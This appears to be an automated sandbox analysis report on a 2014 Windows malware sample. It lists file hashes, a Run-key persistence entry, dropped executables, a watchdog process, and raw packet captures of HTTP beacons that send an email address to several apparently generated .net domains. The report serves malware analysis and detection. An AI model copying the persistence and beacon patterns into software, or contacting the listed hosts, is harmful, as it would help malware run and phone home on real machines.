Analysis Date2014-09-19 04:35:08

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4b2cf71a86a23337463373e101641ea6 sha1: 8dd3b229f099c17e4551508dfecc515e3080a6ed size: 296448
Section.rdata md5: a02a369309816805f3e8cc5505e3de72 sha1: 851ff2bba1ea5c2085d86fae2421efcd8c74f6fe size: 34816 md5: 8293af0f3f166275bbd88fc282d0d775 sha1: 9def5c983b32f19d413eb1a8d9a878f5e0fd5f29 size: 95232
Timestamp2014-07-24 04:47:54
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PC Task Source IKE Media DCOM AutoConnect Error ➝
C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe

↳ C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.bmcxn
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\gnoktrb\apxkqcdhitm.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝
Flows TCP192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b62   se..Host: thinkb
0x00000070 (00112)   65796f6e 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207072 6573656e   se..Host: presen
0x00000070 (00112)   74626569 6e672e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206368 69656662   se..Host: chiefb
0x00000070 (00112)   65696e67 2e6e6574 0d0a0d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207477 656c7665   se..Host: twelve
0x00000070 (00112)   666f7265 7665722e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206869 73746f72   se..Host: histor
0x00000070 (00112)   79666f72 65766572 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   72666f72 65766572 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636c 61737362   se..Host: classb
0x00000070 (00112)   65796f6e 642e6e65 740d0a0d 0a0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b66   se..Host: thinkf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207072 6573656e   se..Host: presen
0x00000070 (00112)   74666c6f 7765722e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636f 6c6c6567   se..Host: colleg
0x00000070 (00112)   65636f72 6e65722e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6172 6d616c6c 2e77616c   mail=jarmall.wal
0x00000020 (00032)   6b657240 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206f66 74656e66   se..Host: oftenf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0d0a0a
0x00000080 (00128)                                         

An application has made an attempt to load the C runtime library incorrectly.
 Base Class Array'
benpeneza zsnipcup fmlicdidof baf nen ylgus mjfaffce czefas tgjegspu ovitwircf ljlaqcruu vbsedn luvej xrnozbva zjimo jchopntia dpke mtbo aiflse gin tuo yamlirroz klois lcyu rryee arr fynomssu tcf upwpod jxtemlonob irac cqhokb rbt bbakoa ialfpe lbe zgope msoyui zgdo tbdaafgcu ayvt relsiltf eym nppuyppov blqupju
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
zrnsarlwee wcl dufs wjbectgimc dlad obbzagfro vtf fyove anectefire vugganajpi cnejada ihng rsfejfc voiujduhi tmmanfbi snneiu jzedinldui asjto ufjm zryukh cdpaauglnu tjzo chmool upmnaprt tpsosvju pyju jibgi sae zapboctqa kjl jnjamzta epgdemj hhbegcdu fuptedze dpgancw awat calnangaed oirthodd aedwjegg lghambdiqf twgu lzje dfn avlfiuy imxl tniijelk pccobpj pbqash gmoibivg jazfaq swgas